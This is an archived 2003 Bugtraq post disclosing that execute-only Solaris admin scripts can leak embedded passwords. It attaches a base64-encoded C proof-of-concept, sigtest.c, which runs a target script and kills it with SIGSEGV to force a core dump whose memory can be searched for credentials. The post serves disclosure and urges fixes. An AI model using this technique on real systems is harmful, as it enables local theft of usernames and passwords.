 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Wed, 12 Feb 2003 03:21:49 +0000 (GMT) From: Jon Masters <jonathan@jonmasters.org> To: bugtraq@securityfocus.com Subject: Solaris Signals ---1463811584-1091147387-1045020109=:21227 Content-Type: TEXT/PLAIN; charset=US-ASCII Hi, We all know that old chestnut about tracing setuid programs or scripts, but what about non-setuid scripts which have been installed for users and given execute only permission. For example, a lot of sites provide scripts for users to run which perform some admin related function and thus have usernames or passwords within them - potentially free to users. The thing I want to do is make a few people think about fixing this by taking whatever steps are necessary on a per-installation basis. It is a silly kind of thing which seems to be overlooked all too often. There is some trivial code attached for those who really do not see my point. This is bound to be covered somewhere, I just want to get viewpoints. Jon. ---1463811584-1091147387-1045020109=:21227 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="sigtest.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.10.10302120321480.21227@router> Content-Description: Content-Disposition: attachment; filename="sigtest.c" Lyogc2lndGVzdC5jDQogKiBBIHF1aWNrIGFuZCBkaXJ0eSBoYWNrIGZvciBw cm9vZiBvZiBjb25jZXB0IGV4cGxvaXQgYWdhaW5zdCBsb2NhbCBTb2xhcmlz DQogKiBzeXN0ZW0gc2NyaXB0cyB3aGljaCBoYXZlICt4IHBlcm1pc3Npb24g d2l0aG91dCArci4gVGhpcyBhbGxvd3MgdGhlIHVzZXINCiAqIHRvIG9idGFp biBhIGR1bXAgb2YgdGhlIHByb2Nlc3MgbWVtb3J5IHNwYWNlIGFuZCBydW4g c3RyaW5ncyBvciBzaW1pbGFyDQogKiB0b29sIHRvIHF1aWNrbHkgb2J0YWlu IHVzZWZ1bCBpbmZvcm1hdGlvbiBzdWNoIGFzIHVzZXJuYW1lcyBhbmQgcGFz c3dvcmRzLg0KICogTW90dG86IGNhdGNoIHRob3NlIHNpZ25hbHMuDQogKg0K ICogVXNlOiBydW4gdGhlIHByb2dyYW0sIHJlYWQgdGhlIGNvcmUgZHVtcC4g Tm8gcm9ja2V0IHNjaWVuY2UgcmVxdWlyZWQgYW5kDQogKiBvYnZpb3VzbHkg bm8gZXhwbG9pdCBjb2RlIGVpdGhlciBnaXZlbiBhIHN1aXRhYmxlIHNoZWxs IGVudmlyb25tZW50LiBZZXMsDQogKiBpdCBpcyBzdHVwaWQgYnV0IGl0IGRv ZXMgd29yayBvbiB0b28gbWFueSBzeXN0ZW1zIGFuZCBuZWVkcyB0byBiZSBm aXhlZC4NCiAqDQogKiBDb21waWxlIHVzaW5nICJnY2MgLVdhbGwgLS1wZWRh bnRpYy1lcnJvcnMgLW8gc2lndGVzdCBzaWd0ZXN0LmMiDQogKi8NCg0KLyog SW5jbHVkZSB1c2VmdWwgaGVhZGVyIGZpbGVzLiAqLw0KDQojaW5jbHVkZSA8 c3RkaW8uaD4NCiNpbmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxzeXMv dHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2x1ZGUgPHN0 ZGxpYi5oPg0KI2luY2x1ZGUgPHNpZ25hbC5oPg0KDQojZGVmaW5lIENISUxE X0FSR1ZfTEVOR1RIIDINCiNkZWZpbmUgVFJVRSAxDQoNCmludCBtYWluKGlu dCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgDQogIGludCBjaGlsZF9waWQg PSAwOw0KICBjaGFyICpjaGlsZF9hcmd2W0NISUxEX0FSR1ZfTEVOR1RIXTsN CiAgc3RydWN0IHJsaW1pdCBybHA7DQoNCiAgaWYgKGFyZ2MgIT0gMikgew0K ICAgIHByaW50ZigiVXNhZ2U6XG4lcyBjb21tYW5kXG4iLGFyZ3ZbMF0pOw0K ICAgIGV4aXQoMSk7DQogIH0NCiAgY2hpbGRfYXJndlswXSA9IGFyZ3ZbMV07 DQogIA0KICBwcmludGYoIlRoZSBlbnRlcnRhaW5tZW50IHN0YXJ0cyBoZXJl Li4uXG4iKTsNCiAgDQogIGlmICgoY2hpbGRfcGlkID0gZm9yaygpKSA9PSAw KSB7DQoNCiAgICBpZiAoZ2V0cmxpbWl0KFJMSU1JVF9DT1JFLCAmcmxwKSAh PSAwKSB7DQogICAgICBwcmludGYoIkNvdWxkIG5vdCBnZXQgbGltaXRzLlxu Iik7DQogICAgICBleGl0KDEpOw0KICAgIH0gZWxzZSB7DQogICAgICBwcmlu dGYoIlRoZSBjdXJyZW50IGxpbWl0IGlzOiAlZC5cbiIsKGludClybHAucmxp bV9jdXIpOw0KICAgIH0NCiAgICBwcmludGYoIkkgYW0gdGhlIGNoaWxkIHBy b2Nlc3MgYW5kIG15IHByb2Nlc3MgaWQgaXMgJWRcbiIsDQoJICAgKGludCln ZXRwaWQoKSk7DQoNCiAgICAvKiBjaGlsZF9hcmd2WzBdID0gIi4vdGVzdF9z Y3JpcHQuc2giOyAqLw0KICAgIGNoaWxkX2FyZ3ZbMV0gPSBOVUxMOw0KICAg IHByaW50ZigiSW52b2tpbmcgcHJvZ3JhbTogJXNcbiIsY2hpbGRfYXJndlsw XSk7DQogICAgZmZsdXNoKHN0ZG91dCk7DQogICAgaWYgKGV4ZWN2KGNoaWxk X2FyZ3ZbMF0sY2hpbGRfYXJndikgPT0gLTEpIHsNCiAgICAgIHByaW50Zigi QSBkZXNjcmlwdGl2ZSBlcnJvciBtZXNzYWdlLlxuIik7DQogICAgfQ0KICAg IC8qIHN5c3RlbSgiL2Jpbi9scyIpOyAqLyAvKiBBbiBhbHRlcm5hdGl2ZSB3 aGljaCBmb3Jrcy4gKi8NCiAgICBwcmludGYoIlRoaXMgcG9pbnQgaXMgbmV2 ZXIgcmVhY2hlZCBub3JtYWxseVxuIik7DQogIH0gZWxzZSB7DQogICAgLyog VGhpcyBpcyB0aGUgaG9ycmlibHkgdWdseSBiaXQgd2hlcmUgd2Ugc2xlZXAg Zm9yIGFuIGVtcGlyaWNhbCBhbW91bnQgb2YNCiAgICAgICB0aW1lLiBPYnZp b3VzbHkgdGhpcyBpcyBub3QgdGhlIGNvcnJlY3Qgd2F5IHRvIHdyaXRlIGEg Z2VuZXJhbCBwdXJwb3NlDQogICAgICAgZXhwbG9pdCAtIGJ1dCB0aGF0IHdh cyBub3QgdGhlIHBvaW50IG9mIHRoaXMgY29kZS4gR28gZml4IGlmIHlvdSBy ZWFsbHkNCiAgICAgICBoYXZlIG5vIGxpZmUgOi0pIFBlcmhhcHMgc29tZSBz ZW0gb3Igb3RoZXIgcHJvY2VzcyBzeW5jIGNhbiBnbyBoZXJlLiAqLw0KICAg IHVzbGVlcCgxMDAwMCk7DQogICAgd2hpbGUoVFJVRSkgew0KICAgICAgaWYg KGtpbGwoY2hpbGRfcGlkLFNJR1NFR1YpID09IDApIHsNCglwcmludGYoIlRo ZSBwYWNrYWdlIHdhcyBkZWxpdmVyZWQuXG4iKTsNCglicmVhazsNCiAgICAg IH0NCiAgICB9DQogICAgd2FpdHBpZChjaGlsZF9waWQsTlVMTCwwKTsgLyog Y291bGQgdXNlIHdhaXQoKSBhbHNvLiAqLw0KICB9DQogIA0KICBwcmludGYo Ik1haW4gcHJvZ3JhbSBleGl0cyBub3JtYWxseVxuIik7DQogIHJldHVybiAw OyAvKiByZXR1cm4gc29tZXRoaW5nICovDQp9DQo= ---1463811584-1091147387-1045020109=:21227--
| |||||||||||||||||||||
|
|